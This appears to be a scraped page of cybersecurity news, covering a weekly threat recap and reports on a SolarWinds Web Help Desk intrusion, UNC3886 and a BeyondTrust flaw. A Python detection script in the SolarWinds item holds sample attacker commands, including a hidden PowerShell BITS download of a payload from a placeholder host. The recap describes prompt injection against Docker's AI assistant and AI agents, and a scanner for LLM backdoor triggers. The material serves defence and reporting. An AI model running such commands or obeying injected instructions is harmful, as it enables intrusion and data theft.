    ANY.RUN brings that foundation together in one place. It gives your team the visibility, automation, and enterprise-grade control needed to reduce delays, lower escalation pressure, and keep operations stable.

    Trusted by CISOs to deliver:

    • Faster MTTR through early behavior evidence
    • Lower risk of business disruption and costly incidents
    • Fewer unnecessary escalations and cleaner handoffs
    • Less burnout and better team retention
    • Stronger ROI from existing security investments

    Ready to see what this looks like in your environment?

    Request ANY.RUN access to build a faster, more sustainable SOC on evidence, control, and repeatable workflows, without adding headcount.



    Source: thehackernews.com…

  • ⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More

    ⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More

    Ravie Lakshmanan – Feb 09, 2026 – Hacking News / Cybersecurity

    Cyber threats are no longer coming from just malware or exploits. They’re showing up inside the tools, platforms, and ecosystems organizations use every day. As companies connect AI, cloud apps, developer tools, and communication systems, attackers are following those same paths.

    A clear pattern this week: attackers are abusing trust. Trusted updates, trusted marketplaces, trusted apps, even trusted AI workflows. Instead of breaking security controls head-on, they’re slipping into places that already have access.

    This recap brings together those signals — showing how modern attacks are blending technology abuse, ecosystem manipulation, and large-scale targeting into a single, expanding threat surface.

    ⚡ Threat of the Week

    OpenClaw announces VirusTotal Partnership — OpenClaw has announced a partnership with Google’s VirusTotal malware scanning platform to scan skills that are being uploaded to ClawHub as part of a defense-in-depth approach to improve the security of the agentic ecosystem. The development comes as the cybersecurity community has raised concerns that autonomous artificial intelligence (AI) tools’ persistent memory, broad permissions, and user‑controlled configuration could amplify existing risks, leading to prompt injections, data exfiltration, and exposure to unvetted components. This has also been complemented by the discovery of malicious skills on ClawHub, a public skills registry to augment the capabilities of AI agents, once again demonstrating that marketplaces are a gold mine for criminals who populate the store with malware to prey on developers. To make matters worse, Trend Micro disclosed that it observed malicious actors on the Exploit.in forum actively discussing the deployment of OpenClaw skills to support activities such as botnet operations. Another report from Veracode revealed that the number of packages on npm and PyPI with the name “claw” has increased exponentially from nearly zero at the start of the year to over 1,000 as of early February 2026, providing new avenues for threat actors to smuggle malicious typosquats. “Unsupervised deployment, broad permissions, and high autonomy can turn theoretical risks into tangible threats, not just for individual users but also across entire organizations,” Trend Micro said. “Open-source agentic tools like OpenClaw require a higher baseline of user security competence than managed platforms.” 

    🔔 Top News

    • German Agencies Warn of Signal Phishing — Germany’s Federal Office for the Protection of the Constitution (aka Bundesamt für Verfassungsschutz or BfV) and Federal Office for Information Security (BSI) have issued a joint advisory warning of a malicious cyber campaign undertaken by a likely state-sponsored threat actor that involves carrying out phishing attacks over the Signal messaging app. The attacks have been mainly directed at high-ranking targets in politics, the military, and diplomacy, as well as investigative journalists in Germany and Europe. The attack chains exploit legitimate PIN and device linking features in Signal to take control of victims’ accounts.
    • AISURU Botnet Behind 31.4 Tbps DDoS Attack — The botnet known as AISURU/Kimwolf has been attributed to a record-setting distributed denial-of-service (DDoS) attack that peaked at 31.4 Terabits per second (Tbps) and lasted only 35 seconds. The attack took place in November 2025, according to Cloudflare, which automatically detected and mitigated the activity. AISURU/Kimwolf has also been linked to another DDoS campaign codenamed The Night Before Christmas that commenced on December 19, 2025. In all, DDoS attacks surged by 121% in 2025, reaching an average of 5,376 attacks automatically mitigated every hour.
    • Notepad++ Hosting Infrastructure Breached to Distribute Chrysalis Backdoor — Between June and October 2025, threat actors quietly and very selectively redirected traffic from Notepad++’s updater program, WinGUp, to an attacker-controlled server that downloaded malicious executables. The attacker lost their foothold on the third-party hosting provider’s server on September 2, 2025, following scheduled maintenance during which the server firmware and kernel were updated. However, the attackers still had valid credentials in their possession, which they used to continue routing Notepad++ update traffic to their malicious servers until at least December 2, 2025. The adversary specifically targeted the Notepad++ domain by taking advantage of the insufficient update verification controls that existed in older versions of Notepad++. The findings show that updates cannot be treated as trusted just because they come from a legitimate domain, as the blind spot can be abused as a vector for malware distribution. The sophisticated supply chain attack has been attributed to a threat actor known as Lotus Blossom. “Attackers prize distribution points that touch a large population,” a Forrester analysis said. “Update servers, download portals, package managers, and hosting platforms become efficient delivery systems, because one compromise creates thousands of downstream victims.”
    • DockerDash Flaw in Docker AI Assistant Leads to RCE — A critical-severity bug in Docker’s Ask Gordon AI assistant can be exploited to compromise Docker environments. Called DockerDash, the vulnerability exists in the Model Context Protocol (MCP) Gateway’s contextual trust, where malicious instructions embedded into a Docker image’s metadata labels are forwarded to the MCP and executed without validation. This is made possible because the MCP Gateway does not distinguish between informational metadata and runnable internal instructions. Furthermore, the AI assistant trusts all image metadata as safe contextual information and interprets commands in metadata as legitimate tasks. Noma Security named the technique meta-context injection. It was addressed by Docker with the release of version 4.50.0 in November 2025.
    • Microsoft Develops Scanner to Detect Hidden Backdoors in LLMs — Microsoft has developed a scanner designed to detect backdoors in open-weight AI models in hopes of addressing a critical blind spot for enterprises that are dependent on third-party large language models (LLMs). The company said it identified three observable indicators that suggest the presence of backdoors in language models: a shift in how a model pays attention to a prompt when a hidden trigger is present, almost independently from the rest of the prompt; models tend to leak their own poisoned data, and partial versions of the backdoor can still trigger the intended response. “The scanner we developed first extracts memorized content from the model and then analyzes it to isolate salient substrings,” Microsoft noted. “Finally, it formalizes the three signatures above as loss functions, scoring suspicious substrings and returning a ranked list of trigger candidates.”

    ‎️‍🔥 Trending CVEs

    New vulnerabilities surface daily, and attackers move fast. Reviewing and patching early keeps your systems resilient.

    Here are this week’s most critical flaws to check first — CVE-2026-25049 (n8n), CVE-2026-0709 (Hikvision Wireless Access Point), CVE-2026-23795 (Apache Syncope), CVE-2026-1591, CVE-2026-1592 (Foxit PDF Editor Cloud), CVE-2025-67987 (Quiz and Survey Master plugin), CVE-2026-24512 (ingress-nginx), CVE-2026-1207, CVE-2026-1287, CVE-2026-1312 (Django), CVE-2026-1861, CVE-2026-1862 (Google Chrome), CVE-2026-20098 (Cisco Meeting Management), CVE-2026-20119 (Cisco TelePresence CE Software and RoomOS), CVE-2026-0630, CVE-2026-0631, CVE-2026-22221, CVE-2026-22222, CVE-2026-22223, CVE-2026-22224, CVE-2026-22225, CVE-2026-22226, CVE-2026-22227, CVE-2026-22229 (TP-Link Archer BE230), CVE-2026-22548 (F5 BIG-IP), CVE-2026-1642 (F5 NGINX OSS and NGINX Plus), and CVE-2025-6978 (Arista NG Firewall).

    📰 Around the Cyber World

    • OpenClaw is Riddled With Security Concerns — The skyrocketing popularity of OpenClaw (née Clawdbot and Moltbot) has attracted cybersecurity worries. With artificial intelligence (AI) agents having entrenched access to sensitive data, giving “bring-your-own-AI” systems privileged access to applications and the user conversations carries significant security risks. The architectural concentration of power means AI agents are designed to store secrets and execute actions – features that are all essential to meet their objectives. But when they are misconfigured, the very design that serves as their backbone can collapse multiple security boundaries at once. Pillar Security has warned that attackers are actively scanning exposed OpenClaw gateways on port 18789. “The traffic included prompt injection attempts targeting the AI layer — but the more sophisticated attackers skipped the AI entirely,” researchers Ariel Fogel and Eilon Cohen said. “They connected directly to the gateway’s WebSocket API and attempted authentication bypasses, protocol downgrades to pre-patch versions, and raw command execution.” Attack surface management firm Censys said it identified 21,639 exposed OpenClaw instances as of January 31, 2026. “Clawdbot represents the future of personal AI, but its security posture relies on an outdated model of endpoint trust,” said Hudson Rock. “Without encryption-at-rest or containerization, the ‘Local-First’ AI revolution risks becoming a goldmine for the global cybercrime economy.”
    • Prompt Injection Risks in MoltBook — A new analysis of MoltBook posts has revealed several critical risks, including “506 prompt injection attacks targeting AI readers, sophisticated social engineering tactics exploiting agent psychology, anti-human manifestos receiving hundreds of thousands of upvotes, and unregulated cryptocurrency activity comprising 19.3% of all content,” according to Simula Research Laboratory. British programmer Simon Willison, who coined the term prompt injection in 2022, has described Moltbook as the “most interesting place on the internet right now.” Vibe-coded by its creator, Matt Schlicht, Moltbook marks the first time AI agents built atop the OpenClaw platform can communicate with each other, post, comment, upvote, and create sub-communities without human intervention. While Moltbook is pitched as a way to offload tedious tasks, equally apparent are the security pitfalls, given the deep access the AI agents have to personal information. Prompt injection attacks hidden in natural language text can instruct an AI agent to reveal private data.
    • Malicious npm Packages Use EtherHiding Technique — Cybersecurity researchers have discovered a set of 54 malicious npm packages targeting Windows systems that use an Ethereum smart contract as a dead drop resolver to fetch a command-and-control (C2) server to receive next-stage payloads. This technique, codenamed EtherHiding, is notable because it makes takedown efforts more difficult, allowing the operators to modify the infrastructure without making any changes to the malware itself. “The malware includes environment checks designed to evade sandbox detection, specifically targeting Windows systems with 5 or more CPUs,” Veracode said. Other capabilities of the malware include system profiling, registry persistence via a COM hijacking technique, and a loader to execute the second-stage payload delivered by the C2. The C2 server is currently inactive, making it unclear what the exact motives are.
    • Ukraine Rolls Out Verification for Starlink — Ukraine has rolled out a verification system for Starlink satellite internet terminals used by civilians and the military after confirming that Russian forces have begun installing the technology on attack drones. The Ukrainian government has introduced a mandatory allowlist for Starlink terminals, as part of which only verified and registered devices will be allowed to operate in the country. All other terminals will be automatically disconnected.
    • Cellebrite Tech Used Against Jordanian Civil Society — The Jordanian government used Cellebrite digital forensic software to extract data from phones belonging to at least seven Jordanian activists and human rights defenders between late 2023 and mid-2025, according to a new report published by the Citizen Lab. The extractions occurred while the activists were being interrogated or detained by authorities. Some of the recent victims were activists who organized protests in support of Palestinians in Gaza. Citizen Lab said it uncovered iOS and Android indicators of compromise tied to Cellebrite in all four phones it forensically analyzed. It’s suspected that authorities have been using Cellebrite since at least 2020.
    • ShadowHS, a Fileless Linux Post‑Exploitation Framework — Threat hunters have discovered a stealthy Linux framework that runs entirely in memory for covert, post-exploitation control. The activity has been codenamed ShadowHS by Cyble. “Unlike conventional Linux malware that emphasizes automated propagation or immediate monetization, this activity prioritizes stealth, operator safety, and long‑term interactive control over compromised systems,” the company said. “The loader decrypts and executes its payload exclusively in memory, leaving no persistent binary artifacts on disk. Once active, the payload exposes an interactive post‑exploitation environment that aggressively fingerprints host security controls, enumerates defensive tooling, and evaluates prior compromise before enabling higher‑risk actions.” The framework supports various dormant modules that support credential access, lateral movement, privilege escalation, cryptomining, memory inspection, and data exfiltration.
    • Incognito Operator Gets 30 Years in Prison — Rui-Siang Lin, 24, was sentenced to 30 years in U.S. prison for his role as an administrator of Incognito Market, which facilitated millions of dollars’ worth of drug sales. Lin ran Incognito Market from January 2022 to March 2024 under the moniker “Pharaoh,” enabling the sale of more than $105 million of narcotics. Incognito Market allowed about 1,800 vendors to sell to a customer base exceeding 400,000 accounts. In all, the operation facilitated about 640,000 narcotics transactions. Lin was arrested in May 2024, and he pleaded guilty to the charges later that December. “While Lin made millions, his offenses had devastating consequences,” said U.S. Attorney Jay Clayton. “He is responsible for at least one tragic death, and he exacerbated the opioid crisis and caused misery for more than 470,000 narcotics users and their families.”
    • INC Ransomware Group’s Slip-Up Proves Costly — Cybersecurity firm Cyber Centaurs said it has helped a dozen victims recover their data after breaking into the backup server of the INC Ransomware group, where the stolen data was dumped. The INC group started operations in 2023 and has listed more than 100 victims on its dark web leak site. “While INC Ransomware demonstrated careful planning, hands-on execution, and effective use of legitimate tools (LOTL), they also left behind infrastructure and artifacts that reflected reuse, assumption, and oversight,” the company said. “In this instance, those remnants, particularly related to Restic, created an opening that would not normally exist in a typical ransomware response.”
    • Xinbi Marketplace Accounts for $17.9B in Total Volume — A new analysis from TRM Labs has revealed that the illicit Telegram-based guarantee marketplace known as Xinbi has continued to remain active, while those of its competitors, Haowang (aka HuiOne) Guarantee and Tudou Guarantee, dropped by 100% and 74%, respectively. Wallets associated with Xinbi have received approximately $8.9 billion and processed roughly $17.9 billion in total transaction volume. “Guarantee services attract illicit actors by offering informal escrow, wallet services, and marketplaces with minimal due diligence, making them a critical laundering facilitator layer,” the blockchain intelligence firm said.
    • XBOW Uncovers 2 IDOR Flaws in Spree — The AI-powered offensive security platform XBOW discovered two previously unknown Insecure Direct Object Reference (IDOR) vulnerabilities (CVE-2026-22588 and CVE-2026-22589) in Spree, an open-source e-commerce platform, that allow an attacker to access guest address information without supplying valid credentials or session cookies and to retrieve other users’ address information by editing an existing, legitimate order. The issues were fixed in Spree version 5.2.5.

    🎥 Cybersecurity Webinars

    • Cloud Forensics Is Broken — Learn From Experts What Actually Works: Cloud attacks move fast and often leave little usable evidence behind. This webinar explains how modern cloud forensics works—using host-level data and AI to reconstruct attacks faster, understand what really happened, and improve incident response across SOC teams.
    • Post-Quantum Cryptography: How Leaders Secure Data Before Quantum Breaks It: Quantum computing is advancing fast, and it could eventually break today’s encryption. Attackers are already collecting encrypted data now to decrypt later when quantum power becomes available. This webinar explains what that risk means, how post-quantum cryptography works, and what security leaders can do today—using practical strategies and real deployment models—to protect sensitive data before quantum threats become reality.

    🔧 Cybersecurity Tools

    • YARA Rule Skill (Community Edition): It is a tool that helps an AI agent write, review, and improve YARA detection rules. It analyzes rules for logic errors, weak strings, and performance problems using established best practices. Security teams use it to strengthen malware detection, improve rule accuracy, and ensure rules run efficiently with fewer false positives.
    • Anamnesis: It is a research framework that tests how LLM agents turn a vulnerability report and a small trigger PoC into working exploits under real defenses (ASLR, NX, RELRO, CFI, shadow stack, sandboxing). It runs controlled experiments to see what bypasses work, how consistent the results are across runs, and what that implies for practical risk.

    Disclaimer: These tools are provided for research and educational use only. They are not security-audited and may cause harm if misused. Review the code, test in controlled environments, and comply with all applicable laws and policies.

    Conclusion

    The takeaway this week is simple: exposure is growing faster than visibility. Many risks aren’t coming from unknown threats, but from known systems being used in unexpected ways. Security teams are being forced to watch not just networks and endpoints, but ecosystems, integrations, and automated workflows.

    What matters now is readiness across layers — software, supply chains, AI tooling, infrastructure, and user platforms. Attackers are operating across all of them at once, blending old techniques with new access paths.

    Staying secure is no longer about fixing one flaw at a time. It’s about understanding how every connected system can influence the next — and closing those gaps before they’re chained together.


    Source: thehackernews.com…

  • SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers

    SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers

    Ravie Lakshmanan – Feb 09, 2026 – Vulnerability / Endpoint Security

    Microsoft has revealed that it observed a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization’s network to other high-value assets.

    That said, the Microsoft Defender Security Research Team said it’s not clear whether the activity weaponized recently disclosed flaws (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), or a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8).

    “Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” the company said in a report published last week.

    While CVE-2025-40536 is a security control bypass vulnerability that could allow an unauthenticated attacker to gain access to certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could lead to remote code execution.

    Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to apply the fixes for the flaw by February 6, 2026.

    In the attacks detected by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed the attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.

    “Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution,” researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini noted.

    In the next stage, the threat actors downloaded legitimate components associated with Zoho ManageEngine, a legitimate remote monitoring and management (RMM) solution, to enable persistent remote control over the infected system. The attackers followed it up with a series of actions –

    • Enumerated sensitive domain users and groups, including Domain Admins.
    • Established persistence via reverse SSH and RDP access, with the attackers also attempting to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account at system startup to cover up the tracks within a virtualized environment while exposing SSH access via port forwarding.
    • Used DLL side-loading on some hosts by using “wab.exe,” a legitimate system executable associated with the Windows Address Book, to launch a rogue DLL (“sspicli.dll”) to dump the contents of LSASS memory and conduct credential theft.

    In at least one case, Microsoft said the threat actors conducted a DCSync attack, where a Domain Controller (DC) is simulated to request password hashes and other sensitive information from an Active Directory (AD) database.
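    The four behaviours Microsoft’s researchers describe above (WHD spawning PowerShell that uses BITS, the QEMU scheduled task under SYSTEM, the wab.exe/sspicli.dll side-load, and DCSync replication) expressed as detection checks run over constructed sample events. This is an added example, not code from Microsoft’s report: the event field names, the assumed WHD host processes (java.exe/tomcat9.exe) and the sample paths are assumptions, and the DCSync check keys on the DS-Replication-Get-Changes-All control access right GUID as it appears in Security event 4662.

```python
"""Detection checks for the WHD intrusion chain described above.

Added example, not Microsoft's detection logic. Events are constructed
dicts loosely modelled on Sysmon / Windows Security telemetry; the field
names, the WHD host-process names and all sample paths are assumptions.
"""
import re
from typing import Dict, List, Tuple

# Assumed process names under which the Java-based WHD application runs.
WHD_PARENTS = {"java.exe", "tomcat9.exe"}
# PowerShell indicators of BITS being used for download (bitsadmin or the
# BitsTransfer module's Start-BitsTransfer cmdlet).
BITS_PATTERN = re.compile(r"bitsadmin|bitstransfer", re.I)
# schtasks.exe /create with a QEMU binary in the task action and /ru SYSTEM.
SCHTASK_QEMU = re.compile(r"/create.*qemu.*/ru\s+\"?(nt authority\\)?system", re.I | re.S)
SYSTEM32 = "c:\\windows\\system32\\"
# Control access right requested by DCSync-style replication (event 4662).
DS_REPL_GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def check_event(ev: Dict) -> List[str]:
    """Return the names of the behaviours an event matches (empty if none)."""
    hits: List[str] = []
    kind = ev.get("type")
    if kind == "process_create":
        parent, image = _basename(ev["parent_image"]), _basename(ev["image"])
        cmd = ev.get("command_line", "")
        # 1. WHD service spawning PowerShell that uses BITS for download.
        if parent in WHD_PARENTS and image == "powershell.exe" and BITS_PATTERN.search(cmd):
            hits.append("whd_powershell_bits")
        # 2. Scheduled task that launches a QEMU VM as SYSTEM at startup.
        if image == "schtasks.exe" and SCHTASK_QEMU.search(cmd):
            hits.append("schtask_qemu_system")
    elif kind == "image_load":
        loaded = ev["loaded_image"].lower()
        # 3. wab.exe loading sspicli.dll from anywhere but System32 (side-load).
        if _basename(ev["image"]) == "wab.exe" and loaded.endswith("\\sspicli.dll") \
                and not loaded.startswith(SYSTEM32):
            hits.append("wab_sspicli_sideload")
    elif kind == "ds_access":
        # 4. Replication rights requested by a principal that is not a DC.
        if DS_REPL_GET_CHANGES_ALL in ev.get("properties", "").lower() \
                and not ev.get("subject_is_dc", False):
            hits.append("dcsync_replication")
    return hits


def scan(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Run check_event over a batch; returns (event index, host, behaviour)."""
    return [(i, ev["host"], h) for i, ev in enumerate(events) for h in check_event(ev)]


# Constructed sample telemetry (not real logs); placeholder.invalid is a placeholder host.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process_create", "host": "whd01",
     "parent_image": "C:\\Program Files\\WebHelpDesk\\bin\\jre\\bin\\java.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"Import-Module BitsTransfer; "
                     "Start-BitsTransfer -Source http://placeholder.invalid/stage.exe "
                     "-Destination C:\\Users\\Public\\stage.exe\""},
    # Benign: an admin's interactive shell using BITS is not spawned by WHD.
    {"type": "process_create", "host": "admin-ws",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe Start-BitsTransfer -Source \\\\fileserver\\share\\tool.msi -Destination ."},
    {"type": "process_create", "host": "whd01",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": "schtasks.exe /create /tn Updater /tr \"C:\\ProgramData\\qemu\\qemu-system-x86_64.exe "
                     "-hda C:\\ProgramData\\qemu\\disk.qcow2 -nographic\" /sc onstart /ru SYSTEM"},
    {"type": "image_load", "host": "srv02",
     "image": "C:\\Users\\Public\\wab.exe",
     "loaded_image": "C:\\Users\\Public\\sspicli.dll"},
    # Benign: the real wab.exe loading the genuine sspicli.dll from System32.
    {"type": "image_load", "host": "srv02",
     "image": "C:\\Program Files\\Windows Mail\\wab.exe",
     "loaded_image": "C:\\Windows\\System32\\sspicli.dll"},
    {"type": "ds_access", "host": "dc01", "subject": "CORP\\svc_helpdesk", "subject_is_dc": False,
     "properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Benign: replication between domain controllers.
    {"type": "ds_access", "host": "dc01", "subject": "CORP\\DC02$", "subject_is_dc": True,
     "properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for idx, host, behaviour in scan(SAMPLE_EVENTS):
        print(f"event {idx} on {host}: {behaviour}")
```

Each check deliberately keys on the pairing the report highlights (parent process plus BITS, task principal plus QEMU, loader plus DLL path, replication right plus non-DC subject) rather than on any single artifact, so the benign look-alike events produce no findings.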

    To counter the threat, users are advised to keep the WHD instances up-to-date, find and remove any unauthorized RMM tools, rotate service and admin accounts, and isolate compromised machines to limit the breach.

    “This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored,” the Windows maker said.

    “In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.”


    Source: thehackernews.com…

  • China-Linked UNC3886 Targets Singapore Telecom Sector in Cyber Espionage Campaign

    China-Linked UNC3886 Targets Singapore Telecom Sector in Cyber Espionage Campaign

    Ravie Lakshmanan – Feb 09, 2026 – Cyber Espionage / Virtualization


    The Cyber Security Agency (CSA) of Singapore on Monday revealed that the China-nexus cyber espionage group known as UNC3886 targeted its telecommunications sector.

    “UNC3886 had launched a deliberate, targeted, and well-planned campaign against Singapore’s telecommunications sector,” CSA said. “All four of Singapore’s major telecommunications operators (‘telcos’) – M1, SIMBA Telecom, Singtel, and StarHub – have been the target of attacks.”

    The development comes more than six months after Singapore’s Coordinating Minister for National Security, K. Shanmugam, accused UNC3886 of striking high-value strategic targets. UNC3886 is assessed to have been active since at least 2022, targeting edge devices and virtualization technologies to obtain initial access.

    In July 2025, Sygnia disclosed details of a long-term cyber espionage campaign attributed to a threat cluster it tracks as Fire Ant, which shares tooling and targeting overlaps with UNC3886; Sygnia stated that the adversary infiltrates organizations’ VMware ESXi and vCenter environments as well as network appliances.

    Describing UNC3886 as an advanced persistent threat (APT) with “deep capabilities,” the CSA said the threat actors deployed sophisticated tools to gain access to telco systems, in one instance weaponizing a zero-day exploit to bypass a perimeter firewall and siphon a small amount of technical data in support of its operational objectives. The specifics of the flaw were not disclosed.

    In a second case, UNC3886 is said to have deployed rootkits to establish persistent access and conceal its activity. The threat actor also gained unauthorized access to “some parts” of telco networks and systems, including those deemed critical, although the incident is assessed not to have been severe enough to disrupt services.

    CSA said it mounted a cyber operation dubbed CYBER GUARDIAN to counter the threat and limit the attackers’ movement into telecom networks. It also emphasized that there is no evidence that the threat actor exfiltrated personal data such as customer records or cut off internet availability.

    “Cyber defenders have since implemented remediation measures, closed off UNC3886’s access points, and expanded monitoring capabilities in the targeted telcos,” the agency said.


    Source: thehackernews.com…

  • BeyondTrust Fixes Critical Pre-Auth RCE Vulnerability in Remote Support and PRA

    Ravie Lakshmanan | Feb 09, 2026 | Enterprise Security / Network Security

    BeyondTrust has released updates to address a critical security flaw impacting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could result in remote code execution.

    “BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability,” the company said in an advisory released February 6, 2026.

    “By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.”

    The vulnerability, categorized as an operating system command injection, has been assigned the CVE identifier CVE-2026-1731. It’s rated 9.9 on the CVSS scoring system.

    BeyondTrust said successful exploitation of the shortcoming could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user, resulting in unauthorized access, data exfiltration, and service disruption.

    The issue affects the following versions –

    • Remote Support versions 25.3.1 and prior
    • Privileged Remote Access versions 24.3.4 and prior

    It has been patched in the following versions –

    • Remote Support – Patch BT26-02-RS, 25.3.2 and later
    • Privileged Remote Access – Patch BT26-02-PRA, 25.1.1 and later

    The company is also urging self-hosted customers of Remote Support and Privileged Remote Access to apply the patch manually if their instance is not subscribed to automatic updates. Customers running a Remote Support version older than 21.3, or a Privileged Remote Access version older than 22.1, must first upgrade to a newer version before this patch can be applied.

    “Self-hosted customers of PRA may also upgrade to 25.1.1 or a newer version to remediate this vulnerability,” it added.

    According to security researcher and Hacktron AI co-founder Harsh Jaiswal, the vulnerability was discovered on January 31, 2026, through artificial intelligence (AI)-enabled variant analysis, and the researchers found about 11,000 instances exposed to the internet. Additional details of the flaw have been withheld to give users time to apply the patches.

    “About ~8,500 of those are on-prem deployments, which remain potentially vulnerable if patches aren’t applied,” Jaiswal and Mohan Sri Rama Krishna Pedhapati said.

    With security flaws in BeyondTrust Privileged Remote Access and Remote Support having come under active exploitation in the past, it’s essential that users update to the latest version as soon as possible for optimal protection.


    Source: thehackernews.com…